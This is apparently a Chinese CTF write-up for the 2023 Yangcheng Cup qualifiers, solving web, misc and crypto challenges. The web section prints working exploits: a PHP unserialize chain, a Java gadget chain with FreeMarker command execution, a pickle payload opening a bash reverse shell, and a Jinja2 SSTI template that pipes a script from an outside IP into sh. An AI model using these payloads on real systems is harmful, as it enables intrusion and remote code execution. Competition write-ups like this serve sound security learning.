2023“羊城杯”网络安全大赛初赛-WriteUp By EDISEC

01
Web

1

D0n't pl4y g4m3!!!

PHP <= 7.4.21 内置开发服务器(php -S)源码泄露漏洞:向内置服务器发送构造过的请求时,它会把 .php 文件当作静态文件原样返回,从而直接拿到源码。该问题只影响 php -S 这个开发用服务器,不影响 php-fpm/Apache 等正式部署方式。

https://cloud.tencent.com/developer/article/2235691

<?phpheader("HTTP/1.1 302 found");header("Location:https://passer-by.com/pacman/");
class Pro{
    private $exp;
    private $rce2;

    // Magic getter. Note that `$rce2` here is an (undefined) local variable, not $this->rce2,
    // so `$this->$rce2` resolves to an empty property name. Nothing in the working chain
    // relies on this class.
    public function __get($name)
    {
        return $this->$rce2=$this->exp[$rce2];
    }

    // The obvious "cat /flag" sink. hint.zip marks this as the trap: the real exit of the
    // chain is Yang::__call below, not this method.
    public function __toString()
    {
            call_user_func('system', "cat /flag");
     }
}
class Yang{
    // Runs when a method that does not exist is called on a Yang object
    // (Bei::__destruct calls $this->fine->YCB1(...), so $name === 'YCB1').
    public function __call($name, $ary)
    {
        // __wakeup() below sets key=true during unserialize(), so the first half is already true.
        if ($this->key === true || $this->finish1->name) {
            // $this->finish is a Cheng; its private $finish goes through Cheng::__get -> name['finish'].
            if ($this->finish->finish) {
                // Sink: callee taken from the attacker-controlled array $this->now,
                // argument from the call site. With now = ['YCB1' => 'system'] this is system($rce).
                call_user_func($this->now[$name], $ary[0]);
            }
        }
    }
    // Called on Bei->CTF (a *separate* Yang object), so setting now = 0 here does not
    // clobber the `now` array of the Yang stored in Bei->fine.
    public function ycb()
    {
        $this->now = 0;
        return $this->finish->finish;
    }
    public function __wakeup()
    {
        $this->key = True;
    }
}
class Cheng{
    private $finish;
    public $name;
    // $finish is private, so reading ->finish from outside the class lands here and
    // returns name['finish']; the payload sets that to the string "true" (truthy).
    public function __get($value)
    {
        return $this->$value = $this->name[$value];
    }
}
class Bei{
    // Entry point of the chain: runs when the unserialized Bei is destroyed at script end.
    public function __destruct()
    {
        if ($this->CTF->ycb()) {
            // YCB1 does not exist on Yang -> Yang::__call('YCB1', [rce, rce1]).
            $this->fine->YCB1($this->rce, $this->rce1);
        }
    }
    // Sets Bei's own key to false; irrelevant to the chain (Yang::__call checks Yang's key).
    public function __wakeup()
    {
        $this->key = false;
    }
}
function prohib($a){    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|eval|flag/i";    return preg_replace($filter,'',$a);}
$a = $_POST["CTF"];if (isset($a)){  unserialize(prohib($a));}?>

hint.zip内容是

那么源码的call_user_func('system', "cat /flag");就是陷阱,出口应该是call_user_func($this->now[$name], $ary[0]);

构造反序列化链

入口是

Bei::__destruct

$this->CTF->ycb()进到ycb()

Cheng 的 $finish 是 private,在 Yang::ycb() 里通过 $this->finish->finish 从类外访问时会触发 Cheng::__get,它返回 name['finish'];payload 里把它设为字符串 "true"(为真),于是 ycb() 返回真值。

回到Bei

$this->fine->YCB1($this->rce, $this->rce1); 调用了 Yang 中不存在的方法,触发 __call;而 Yang::__wakeup 在反序列化时已经把 $this->key = True,所以直接通过 if 判断,最终执行 call_user_func($this->now['YCB1'], $this->rce),即 system($rce)。注意 Bei::__wakeup 把的是 Bei 自己的 key 置为 false,不影响 Yang 对象。

payload:

O:3:"Bei":3:{s:4:"fine";O:4:"Yang":2:{s:6:"finish";O:5:"Cheng":2:{s:13:"\x00Cheng\x00finish";N;s:4:"name";a:1:{s:6:"finish";s:4:"true";}}s:3:"now";a:1:{s:4:"YCB1";s:6:"syssystemtem";}}s:3:"rce";s:23:"cat /tmp/catcatf1ag.txt";s:3:"CTF";O:4:"Yang":1:{s:6:"finish";O:5:"Cheng":2:{s:13:"\x00Cheng\x00finish";N;s:4:"name";a:1:{s:6:"finish";s:4:"true";}}}}
(说明:\x00 是 private 属性名的修饰前缀,发送时必须是真实的 0x00 字节,所以 "\x00Cheng\x00finish" 长度为 13;s:6:"syssystemtem" 经 prohib() 单次替换后恰好变成 6 字节的 "system",长度字段才能对上;"flag" 关键字会被过滤,因此命令里用的是不含该关键字的路径 /tmp/catcatf1ag.txt。)

2

Ez_java

利用pojonode执行htmlbean中的getHtmlMap,在利用代理类代理HtmlMap,最后成功执行文件上传。

https://www.cnblogs.com/escape-w/p/17326592.html
将 content 设置为下面的 FreeMarker 模板(注意 Java 源码里换行要写成 \n、内层双引号要写成 \",页面渲染时丢掉了这些反斜杠):
public String content = "<#assign ac=springMacroRequestContext.webApplicationContext>\n" +
    "  <#assign fc=ac.getBean('freeMarkerConfiguration')>\n" +
    "    <#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n" +
    "      <#assign VOID=fc.setNewBuiltinClassResolver(dcr)>${\"freemarker.template.utility.Execute\"?new()(\"cat /flag\")}\n";
模板先从 Spring 上下文取到 FreeMarker 的 Configuration,再把 NewBuiltinClassResolver 换回默认配置的解析器(推测题目原本把它收紧了),这样 ?new 才能实例化 freemarker.template.utility.Execute 并执行 cat /flag。

exp

package com.ycbjava.test;import com.fasterxml.jackson.databind.node.POJONode;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;import com.ycbjava.Bean.HtmlBean;import com.ycbjava.Utils.HtmlInvocationHandler;import com.ycbjava.Utils.HtmlMap;import javassist.ClassPool;import javassist.CtClass;import javassist.CtConstructor;import org.springframework.http.HttpEntity;import org.springframework.http.HttpHeaders;import org.springframework.http.ResponseEntity;import org.springframework.web.client.RestTemplate;
import javax.management.BadAttributeValueExpException;import java.io.*;import java.lang.reflect.Constructor;import java.lang.reflect.Field;import java.lang.reflect.InvocationHandler;import java.lang.reflect.Proxy;import java.net.URI;import java.security.*;import java.util.Base64;import java.util.Map;
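public class exp {

    /**
     * Builds the Ez_java gadget chain, writes it to {@code 1.ser}, prints it base64-encoded and
     * replays it once locally.
     *
     * Chain, as far as the visible classes show: BadAttributeValueExpException.val (set by reflection;
     * the constructor would stringify it) -> POJONode(HtmlBean) -> HtmlBean.getHtmlMap() -> a Map proxy
     * backed by HtmlInvocationHandler -> HtmlMap.get(), which calls HtmlUploadUtil.uploadfile(filename,
     * content) and thus drops the FreeMarker template (see HtmlMap).
     *
     * NOTE(review): deserial(...) at the end runs that chain in THIS JVM, i.e. the upload also happens
     * on the attacker's machine; keep it only as a smoke test.
     */
    public static void main(String[] args) throws Exception {
        HtmlMap expMap = new HtmlMap();
        Class<?> handlerClass = Class.forName("com.ycbjava.Utils.HtmlInvocationHandler");
        Constructor<?> handlerCtor = handlerClass.getDeclaredConstructor(Map.class);
        handlerCtor.setAccessible(true);
        InvocationHandler h = (InvocationHandler) handlerCtor.newInstance(expMap);
        // Dynamic proxy: any Map method invoked on it is routed through HtmlInvocationHandler.
        Map mapProxy = (Map) Proxy.newProxyInstance(
                expMap.getClass().getClassLoader(), new Class[]{Map.class}, h);

        // The public constructor is enough here (the reflective variant was commented out in the original).
        HtmlBean templatesImpl = new HtmlBean(new HtmlMap(), "", "");
        templatesImpl.setHtmlMap(mapProxy);
        POJONode jsonNodes = new POJONode(templatesImpl);

        // BadAttributeValueExpException.readObject() calls toString() on val — the kick-off of the chain.
        BadAttributeValueExpException exp = new BadAttributeValueExpException(null);
        setFieldValue(exp, "val", jsonNodes);

        byte[] raw = toBytes(exp);
        // try-with-resources: the original left the FileOutputStream and an unused FileInputStream open,
        // and serialised the object twice.
        try (FileOutputStream fout = new FileOutputStream("1.ser")) {
            fout.write(raw);
        }
        String payload = Base64.getEncoder().encodeToString(raw);
        System.out.println(payload);
        deserial(payload);
    }

    /** Java-serialises {@code o} to a byte array. */
    private static byte[] toBytes(Object o) throws IOException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(baos)) {
            oos.writeObject(o);
        }
        return baos.toByteArray();
    }

    /** Java-serialises {@code o} and returns the bytes base64-encoded (the form sent to the server). */
    public static String serial(Object o) throws IOException, NoSuchFieldException {
        return Base64.getEncoder().encodeToString(toBytes(o));
    }

    /**
     * Base64-decodes {@code data} and deserialises it with a plain ObjectInputStream.
     * No ObjectInputFilter is applied, so this executes whatever gadget chain the bytes contain —
     * only ever feed it payloads you built yourself.
     */
    public static void deserial(String data) throws Exception {
        byte[] bytes = Base64.getDecoder().decode(data);
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bytes))) {
            ois.readObject();
        }
    }

    /** Debug helper (unused): prints the base64 of a buffer and its length. */
    private static void Base64Encode(ByteArrayOutputStream bs) {
        byte[] encode = Base64.getEncoder().encode(bs.toByteArray());
        String s = new String(encode);
        System.out.println(s);
        System.out.println(s.length());
    }

    /** Sets a (possibly private) field declared on {@code obj}'s own class by reflection. */
    private static void setFieldValue(Object obj, String field, Object arg) throws Exception {
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj, arg);
    }
}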

HtmlMap

//// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompiler)//
package com.ycbjava.Utils;
import java.io.Serializable;import java.util.Collection;import java.util.Map;import java.util.Set;
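public class HtmlMap implements Map, Serializable {
    /** Name of the template the upload helper writes — index.ftl so the app renders it. */
    public String filename = "index.ftl";

    /**
     * FreeMarker SSTI payload. It fetches the FreeMarker Configuration from the Spring context,
     * swaps the NewBuiltinClassResolver back to the default configuration's resolver (so {@code ?new}
     * is allowed again) and instantiates freemarker.template.utility.Execute to run "cat /flag".
     * Fixed from the page: the embedded quotes must be escaped and the line breaks are {@code \n}.
     */
    public String content = "<#assign ac=springMacroRequestContext.webApplicationContext>\n"
            + "  <#assign fc=ac.getBean('freeMarkerConfiguration')>\n"
            + "    <#assign dcr=fc.getDefaultConfiguration().getNewBuiltinClassResolver()>\n"
            + "      <#assign VOID=fc.setNewBuiltinClassResolver(dcr)>${\"freemarker.template.utility.Execute\"?new()(\"cat /flag\")}\n";

    public HtmlMap() {
    }

    @Override
    public int size() {
        return 0;
    }

    /** Deliberately false so callers treat the map as non-empty and go on to call get(). */
    @Override
    public boolean isEmpty() {
        return false;
    }

    @Override
    public boolean containsKey(Object key) {
        return false;
    }

    @Override
    public boolean containsValue(Object value) {
        return false;
    }

    /**
     * The gadget: any get() on this map (e.g. via the proxy during Jackson serialisation) uploads
     * {@code content} as {@code filename}. The key is ignored.
     */
    @Override
    public Object get(Object key) {
        try {
            return HtmlUploadUtil.uploadfile(this.filename, this.content);
        } catch (Exception e) {
            throw new RuntimeException(e);
        }
    }

    @Override
    public Object put(Object key, Object value) {
        return null;
    }

    @Override
    public Object remove(Object key) {
        return null;
    }

    @Override
    public void putAll(Map m) {
    }

    @Override
    public void clear() {
    }

    @Override
    public Set keySet() {
        return null;
    }

    @Override
    public Collection values() {
        return null;
    }

    @Override
    public Set<Map.Entry> entrySet() {
        return null;
    }
}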

3

Serpent

www.zip

伪造jwt

替换session后访问,下一步

看到hint

拿到源码

@app.route('/src0de')def src0de():    f = open(__file__, 'r')    rsp = f.read()    f.close()    return rsp[rsp.index("@app.route('/src0de')"):]
@app.route('/ppppppppppick1e')
def ppppppppppick1e():
    # Pickle sink: the `pick1e` cookie is base64-decoded and, if check() accepts it, handed to
    # pickle.loads(). Unpickling runs arbitrary code, so check() (not shown in this excerpt) is
    # the only defence; the payload below gets past it with the `o` (OBJ) opcode, presumably
    # because the usual `R` (REDUCE) is what check() looks for.
    try:
        username = "admin"
        rsp = make_response("Hello, %s " % username)
        rsp.headers['hint'] = "Source in /src0de"
        pick1e = request.cookies.get('pick1e')
        if pick1e is not None:
            pick1e = base64.b64decode(pick1e)
        else:
            return rsp
        if check(pick1e):
            pick1e = pickle.loads(pick1e)  # RCE point
            return "Go for it!!!"
        else:
            return "No Way!!!"
    except Exception as e:
        # Returns the raw exception text to the client — convenient for the attacker.
        error_message = str(e)
        return error_message
    # Unreachable: every path above returns.
    return rsp
class GWHT():    def __init__(self):        pass
if __name__ == '__main__':    app.run('0.0.0.0', port=80)

构造pickle反序列化,拿到flag

payload:

import base64c = b'''(cossystemS'bash -c "bash -i >& /dev/tcp/123/777 0>&1"'o.'''print(base64.b64encode(c))

4

ezyaml

PyYaml 反序列化打不通;发现服务端解压 tar 时没有校验成员路径,可以目录穿越:把应用的模板文件 templates/result.html 覆盖成下面的 Jinja2 SSTI payload,再访问渲染该模板的页面即可执行命令。

payload:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('curl http://139.159.163.195:8080/1|sh').read()") }}{% endif %}{% endfor %}
写好反弹 shell 的脚本(即上面模板里 curl 下来再交给 sh 执行的那个文件),然后把 SSTI 模板打进 tar,并用 -P 保留 ../ 路径:

tar cPvf 5x.tar ../../templates/result.html

然后直接上传5x.tar

5

ArkNights

非预期解:/read 接口可以读任意文件,直接读 /proc/1/environ(1 号进程的环境变量),题目把 flag 放在了容器的环境变量里。

payload:

url/read?file=/proc/1/environ
02
Misc

1

ai和nia的交响曲

pcap包提取flag1.png和flag2.zip

flag1.png直接二进制转字符

flag1.png 二维码转01,然后转字符串

from PIL import Image

# Turn the QR-code image into a bit string: a bright red channel (> 200) is '1', anything else '0'.
image = Image.open('./flag1.png').convert('RGB')
width, height = image.size

bits = []
for y in range(height):
    for x in range(width):
        # Coordinates are kept as (y, x) from the original, i.e. the image is walked
        # column by column. This only works for a square image — confirm before reuse.
        red, _green, _blue = image.getpixel((y, x))
        bits.append('1' if red > 200 else '0')

with open("flag.txt", "w") as f:
    f.write(''.join(bits))
HINT:BV1wW4y1R7Jv&&FLAG1:@i_n1a_l0v3S_

flag2.zip 是伪加密:ZIP 头里的加密标志位(通用标记位 bit 0)被置 1,但数据并没有真正加密,把标志位改回 0 即可正常解压。

解密后直接看txt中的数字对应HINT中视频的秒数

其实可以猜测出来为CAOCAOGAIFAN(曹操盖饭

flag: @i_n1a_l0v3S_CAOCAOGAIFAN

2

GIFUCK

获取图片后,先找个网站分离惹

根据特征像素写脚本获取字符

一开始直接把识别出的字符拼起来跑 brainfuck 不行,后来意识到 GIF 每一帧的显示时长也是信息:帧时长/60 就是这一帧字符的重复次数,按此把每帧字符展开,才能得到完整的 brainfuck 程序。

from PIL import Imageimport matplotlibtime=[0,240,60,60,60,240,60,60,60,60,60,60,360,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,60,1860,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,120,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,120,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,120,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,
60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,120,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,180,60,180,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,60,180,60,60,60,60,60,240,60,60,60,60,60,60,240,60,60,60,60,60,60,60,60,60,60,60,60,180,60,180,60,120,540,60,60,60,540,60,60,60,120,60,60,300,60,60,60,300,60,60,60,180,60,180,120,420,60,60,540,60,60,60,540,60,60,60,480,60,60,480,60,60,60,480,60,60,60,120,60,60,240,60,60,60,240,60,60,60,180,60,60,60,60,540,60,60,60,540,60,60,60,180,60,60,540,60,60,60,540,60,60,60,480,60,60,180,60,60,60,180,60,60,60,60,60,360,60,180,60,60,540,60,60,60,540,60,60,60,60,60,60,480,60,60,60,480,60,60,60,360,60,360,60,60,180,60,60,60,180,60,60,60,120,60,360,60,60,480,60,60,60,480,60,60,60,420,60,60,480,60,60,60,480,60,60,60,540,60,60,180,60,60,60,180,60,60,60,60,60,60,540,60,60,60,540,60,60,60,120,60,60,480,60,60,60,480,60,60,60,840,60,60,60,300,60,60,540,60,60,60,540,60,60,60,180,60,60,480,60,60,60,480,60,60,60,480,60,180,60,60,180,60,60,60,180,60,60,60,240,60,60,180,60,60,60,180,60,60,60,240,60,60,420,60,60,60,420,60,60,60,360,60,60,60,60,60]c=""print(len(time))for i in range(1,1100):    img=Image.open("flag_{}.jpeg".format(i))    if(img.getpixel((20,12))[0]==0 and img.getpixel((20,12))[1]==0 and img.getpixel((20,12))[2]==0):        c+='['*(time[i]//60)    elif(img.getpixel((26,12))[0]==0 and img.getpixel((26,12))[1]==0 and img.getpixel((26,12))[2]==0):        c+="]"*(time[i]//60)    elif (img.getpixel((31,15))[0] == 0 and img.getpixel((31,15))[1] == 0 and 
img.getpixel((31,15))[2] == 0):        c += "<"*(time[i]//60)    elif(img.getpixel((16,14))[0]==0 and img.getpixel((16,14))[1]==0 and img.getpixel((16,14))[2]==0):        c+=">"*(time[i]//60)    elif(img.getpixel((16,24))[0]==0 and img.getpixel((16,24))[1]==0 and img.getpixel((16,24))[2]==0 and img.getpixel((24,18))[0]==0 and img.getpixel((24,18))[1]==0 and img.getpixel((24,18))[2]==0):        c+="+"*(time[i]//60)    elif(img.getpixel((25,25))[0]==0 and img.getpixel((25,25))[1]==0 and img.getpixel((25,25))[2]==0 and img.getpixel((30,23))[0]==0 and img.getpixel((30,23))[1]==0 and img.getpixel((30,23))[2]==0):        c+="-"*(time[i]//60)    else:        c+='.'*(time[i]//60)print(c)print(len(c))

则提取出完整的brainfuck代码,但是提示

“Sorry flag is not here”

猜测 flag 并没有被输出,而是留在 brainfuck 的内存(纸带)里(套路同 2021 长城杯 Misc [你这flag保熟吗])

在正常字符前下断点

用Esoteric IDE跑即得到flag

DASCTF{Pen_Pineapple_Apple_Pen}

3

Easy_VMDK

1、根据题目提示,压缩包压缩了但没有变小,说明用的是仅存储(store)方式;ZIP 传统加密(ZipCrypto)存在已知明文攻击,至少需要 12 字节已知明文,而 VMDK 文件头前 12 个字节是固定的,正好够用,于是可以用已知明文攻击恢复密钥。

2、用已知明文攻击工具(如 bkcrack)恢复出 ZipCrypto 的三个内部密钥

[ e6a73d9f 21ccfdbc f3e0c61c ]

3、将vmdk拖到取证工具一把梭,得到一个key.txt和一个flag.zip

4、flag.zip中藏了一个zip里面内容是

5、根据所给脚本写逆回去的脚本,得到压缩包密码

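import cv2
import base64
import binascii
import numpy as np

# key.txt holds one base64 line per pixel; rebuild the image those pixels came from.
# NOTE(review): the names are the challenge's — `height, width = 137, 2494` but the array is
# allocated (width, height, 3), i.e. 2494 rows x 137 columns. Kept as-is because the fill
# order below (c = row 0..2493, r = column 0..136) matches it.
height, width = 137, 2494
image = np.zeros((width, height, 3), dtype=np.uint8)
print(image.shape)

r = 0  # column, 0..136 (137 total)
c = 0  # row, 0..2493 (2494 total)

with open("key.txt", "r") as f:
    lines = f.readlines()
    print(len(lines))
    for line in lines:
        text = base64.b64decode(line.strip())
        # NOTE(review): b2a_uu *encodes* bytes as a uuencode line; its output never contains
        # ", ", so this step only makes sense if a2b_uu (decode) was meant — verify against the
        # challenge's own encoding script before reusing.
        img = binascii.b2a_uu(text).strip().decode().split(", ")
        rgb_values = [int(x) for x in img]
        rgb_tuple = tuple(rgb_values)
        print(rgb_tuple)
        image[c, r] = rgb_tuple
        c += 1
        if c == 2494:
            r += 1
            c = 0
        # Stop once all 137 columns are filled. The original tested `r > 137`, which lets one
        # extra line reach image[c, 137] and IndexError if key.txt has more lines than pixels.
        if r >= 137:
            break

cv2.imwrite("key.png", image)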

HELLO_DASCTF2023_WORLD

6、得到flag

4

ez_misc

Windows 11 截图工具裁剪漏洞(aCropalypse):裁剪后保存的 PNG 仍然残留原图数据,把 IHDR 里的宽高改回原尺寸并修正 CRC,即可恢复被裁掉的内容。

crc爆破,修改长宽

github下载工具,放入工具。

03
Crypto

1

MCeorpkpleer

部分p+超递增背包

from sage.numerical.knapsack import Superincreasing
# Challenge parameters.
# p     : the HIGH bits of the prime p (low ~435 bits zero) — recovered with Coppersmith below.
# n, c  : RSA modulus and ciphertext.
# pubkey: Merkle–Hellman-style knapsack public key hiding the bits of e; the first 24 entries
#         are exactly pubkey[i-1]*3 (no modular wrap yet), pubkey[24] is the first that wrapped.
# en_e  : knapsack-encrypted e.
p = 139540788452365306201344680691061363403552933527922544113532931871057569249632300961012384092481349965600565669315386312075890938848151802133991344036696488204791984307057923179655351110456639347861739783538289295071556484465877192913103980697449775104351723521120185802327587352171892429135110880845830815744
n = 22687275367292715121023165106670108853938361902298846206862771935407158965874027802803638281495587478289987884478175402963651345721058971675312390474130344896656045501040131613951749912121302307319667377206302623735461295814304029815569792081676250351680394603150988291840152045153821466137945680377288968814340125983972875343193067740301088120701811835603840224481300390881804176310419837493233326574694092344562954466888826931087463507145512465506577802975542167456635224555763956520133324723112741833090389521889638959417580386320644108693480886579608925996338215190459826993010122431767343984393826487197759618771
c = 156879727064293983713540449709354153986555741467040286464656817265584766312996642691830194777204718013294370729900795379967954637233360644687807499775502507899321601376211142933572536311131955278039722631021587570212889988642265055045777870448827343999745781892044969377246509539272350727171791700388478710290244365826497917791913803035343900620641430005143841479362493138179077146820182826098057144121231954895739989984846588790277051812053349488382941698352320246217038444944941841831556417341663611407424355426767987304941762716818718024107781873815837487744195004393262412593608463400216124753724777502286239464
pubkey = [18143710780782459577, 54431132342347378731, 163293397027042136193, 489880191081126408579, 1469640573243379225737, 4408921719730137677211, 13226765159190413031633, 39680295477571239094899, 119040886432713717284697, 357122659298141151854091, 1071367977894423455562273, 3214103933683270366686819, 9642311801049811100060457, 28926935403149433300181371, 86780806209448299900544113, 260342418628344899701632339, 781027255885034699104897017,
2343081767655104097314691051, 7029245302965312291944073153, 21087735908895936875832219459, 63263207726687810627496658377, 189789623180063431882489975131, 569368869540190295647469925393, 1708106608620570886942409776179, 601827224419797931380408071500, 1805481673259393794141224214500, 893952418336266652976851386463, 2681857255008799958930554159389, 3523079163584485147344841221130, 1524252287869625983140881149316, 50264262166963219975822190911, 150792786500889659927466572733, 452378359502668979782399718199, 1357135078508006939347199154597, 4071405235524020818041597463791, 3169230503688232995231149877299, 462706308180869526799807117823, 1388118924542608580399421353469, 4164356773627825741198264060407, 3448085117999647764701149667147, 1299270151115113835209806487367, 3897810453345341505629419462101, 2648446157152195057994615872229, 3422845870014670444537026359650, 1223552407160181874717436564876, 3670657221480545624152309694628, 1966986461557807413563286569810, 1378466783231507511243038452393, 4135400349694522533729115357179, 3361215846199738142293703557463, 1038662335715384967987468158315, 3115987007146154903962404474945, 302975818554635252993570910761, 908927455663905758980712732283, 2726782366991717276942138196849, 3657854499533237101379593333510, 1928578295715881845245137486456, 1263242285705730806288591202331, 3789726857117192418865773606993, 2324195368467747797703678306905, 2450093503961328663664213663678, 2827787910442071261545819733997, 3960871129884299055190637944954, 2837628186769067706678271320788]
en_e = 31087054322877663244023458448558
PR.<x>=Zmod(n)[]f=p+xps=f.small_roots(X=2^435,beta=0.4)[0]p=p+ZZ(ps)q=n//p
w=pubkey[0]m=pubkey[23]*3-pubkey[24]e_sum=inverse_mod(w,m)*en_e%mL = [pow(3, i) for i in range(len(pubkey))]s=Superincreasing(L).subset_sum(e_sum)e_bin=''for i in L:    if i in s:        e_bin+='1'    else:        e_bin+='0'
e=int(e_bin,2)d=inverse_mod(e,(p-1)*(q-1))m=pow(c,d,n)print(bytes.fromhex(hex(m)[2:]))

2

Easy_3L
from Crypto.Util.number import *

S1 = 28572152986082018877402362001567466234043851789360735202177142484311397443337910028526704343260845684960897697228636991096551426116049875141S2 = 1267231041216362976881495706209012999926322160351147349200659893781191687605978675590209327810284956626443266982499935032073788984220619657447889609681888S4 = 9739918644806242673966205531575183334306589742344399829232076845951304871478438938119813187502023845332528267974698273405630514228632721928260463654612997S5 = 9755668823764800147393276745829186812540710004256163127825800861195296361046987938775181398489372822667854079119037446327498475937494635853074634666112736p = 25886434964719448194352673440525701654705794467884891063997131230558866479588298264578120588832128279435501897537203249743883076992668855905005985050222145380285378634993563571078034923112985724204131887907198503097115380966366598622251191576354831935118147880783949022370177789175320661630501595157946150891275992785113199863734714343650596491139321990230671901990010723398037081693145723605154355325074739107535905777351h = 2332673914418001018316159191702497430320194762477685969994411366563846498561222483921873160125818295447435796015251682805613716554577537183122368080760105458908517619529332931042168173262127728892648742025494771751133664547888267249802368767396121189473647263861691578834674578112521646941677994097088669110583465311980605508259404858000937372665500663077299603396786862387710064061811000146453852819607311367850587534711c = 20329058681057003355767546524327270876901063126285410163862577312957425318547938475645814390088863577141554443432653658287774537679738768993301095388221262144278253212238975358868925761055407920504398004143126310247822585095611305912801250788531962681592054588938446210412897150782558115114462054815460318533279921722893020563472010279486838372516063331845966834180751724227249589463408168677246991839581459878242111459287
M=matrix(ZZ,2,2)M[0,0]=1M[0,1]=hM[1,1]=pf,q=M.LLL()f=abs(f)q=abs(q)
f=2958625475884682403405014470761000210086580211925778089178918430815532447031463283614057163768060620823591903413541344968843101811848989638106999025589699093227724370590844533541264661014288260713331275996479822           q=143265706312185518707360965653484385997990911723976280223660311623608293086933108010191106789268178340653420902857329654860207182679342550588469606976658133500469022125616655674540322895098388733565812347250745a=(c*f%p)S3=inverse_mod(f,q)*a%qS3=ZZ(S3)
# Linear congruential generator S_{i+1} = a*S_i + b (mod n) with five consecutive outputs.
# Successive differences satisfy t_{i+1} = a*t_i (mod n), so n divides both
# t1*t3 - t2^2 and t2*t4 - t3^2; their gcd is n (or a small multiple of it).
# NOTE: `^` is exponentiation in Sage — in plain Python it would be XOR.
t1=S2-S1
t2=S3-S2
t3=S4-S3
t4=S5-S4
n=GCD(t1*t3-t2^2,t2*t4-t3^2)
# Multiplier and increment from two consecutive steps.
a=t2*inverse_mod(t1,n)%n
a=ZZ(a)
b=ZZ((S2-a*S1)%n)
# Step the generator backwards once: S0 = (S1 - b) * a^-1 (mod n) is the seed / flag.
S0=(S1-b)*inverse_mod(a,n)%n
print(long_to_bytes(S0))

3

Danger_RSA
from Crypto.Util.number import *import sympyimport gmpy2
N = 20289788565671012003324307131062103060859990244423187333725116068731043744218295859587498278382150779775620675092152011336913225797849717782573829179765649320271927359983554162082141908877255319715400550981462988869084618816967398571437725114356308935833701495015311197958172878812521403732038749414005661189594761246154666465178024563227666440066723650451362032162000998737626370987794816660694178305939474922064726534186386488052827919792122844587807300048430756990391177266977583227470089929347969731703368720788359127837289988944365786283419724178187242169399457608505627145016468888402441344333481249304670223e = 11079917583c = 13354219204055754230025847310134936965811370208880054443449019813095522768684299807719787421318648141224402269593016895821181312342830493800652737679627324687428327297369122017160142465940412477792023917546122283870042482432790385644640286392037986185997262289003477817675380787176650410819568815448960281666117602590863047680652856789877783422272330706693947399620261349458556870056095723068536573904350085124198592111773470010262148170379730937529246069218004969402885134027857991552224816835834207152308645148250837667184968030600819179396545349582556181916861808402629154688779221034610013350165801919342549766s=21 * 5741t=e//s
XY=gmpy2.iroot(N,4)[0]a=N-XY**4-ex=sympy.Symbol('x')r=sympy.solve([t*x**8-a*x**4+s*XY**4],[x])X=r[1][0]p=int(X**4+s)d=inverse(e,p-1)m=pow(c,int(d),p)print(e*d%(p-1))

PR.<x>=GF(p)[]f=x^3-mfor i in f.roots():    print(long_to_bytes(ZZ(i[0])))

4

XOR贯穿始终

